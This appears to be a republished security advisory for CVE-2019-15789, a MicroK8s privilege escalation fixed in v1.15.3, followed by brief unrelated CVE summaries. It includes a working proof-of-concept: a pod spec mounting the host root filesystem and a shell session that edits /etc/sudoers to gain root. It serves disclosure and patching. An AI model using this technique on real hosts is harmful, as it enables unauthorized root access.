Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.

Overview :
Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.

MICROK8S – PRIVILEGE ESCALATION (CVE-2019-15789)

Sep 10 2019

MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.

Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789

PROOF-OF-CONCEPT EXPLOIT

As low privileged users were allowed to configure the running cluster and containers therein, a malicious user could spawn a pod with complete access to the root file system, edit /etc/sudoers and escalate to root.

doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  swap.img  tmp  var  vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root    ALL=(ALL:ALL) NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)

The above could also be trivially achieved with a privileged container, though MicroK8s disables privileged containers by default. Note: privileged containers are enabled when Istio is installed.

PATCH

The MicroK8s team addressed this vulnerability in v1.15.3 by requiring any access to the Kubernetes installation to be performed by a privileged user (eg, through sudo or by adding the user to the microk8s group).

TIMELINE

12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request, introducing the a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.

CVE-2019-15789

 

Description
MicroK8s prior to v1.15.3 included a privilege escalation vulnerability,
allowing a low privilege user to obtain root access to the host. MicroK8s
allowed any user with access to the host to administer the underlying
Kubernetes installation, including deploy pods. This allowed an attacker
with local access to provision a privileged container and gain root access
to the underlying host.
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15789
https://pulsesecurity.co.nz/advisories/microk8s-privilege-escalation
https://discuss.kubernetes.io/t/explicit-use-of-sudo-in-microk8s-cli/7605

Common Vulnerabilityies and Exposures

Google Chrome prior 95.0.4638.54 WebApp Installer Remote Code Execution

A vulnerability has been found in Google Chrome (Web Browser) and classified as critical. Affected by this vulnerability is an unknown functionality of the component WebApp Installer. Upgrading to version 95.0.4638.54 eliminates this vulnerability.

Cisco IOS XE SD-WAN CLI os command injection [CVE-2021-1529]

A vulnerability, which was classified as critical, was found in Cisco IOS XE SD-WAN (Router Operating System) (the affected version unknown). This affects an unknown functionality of the component CLI. Upgrading eliminates this vulnerability.

Cisco Integrated Management Controller Web-based Management Interface denial of service

A vulnerability has been found in Cisco Integrated Management Controller (the affected version is unknown) and classified as problematic. This vulnerability affects some unknown functionality of the component Web-based Management Interface. Upgrading eliminates this vulnerability.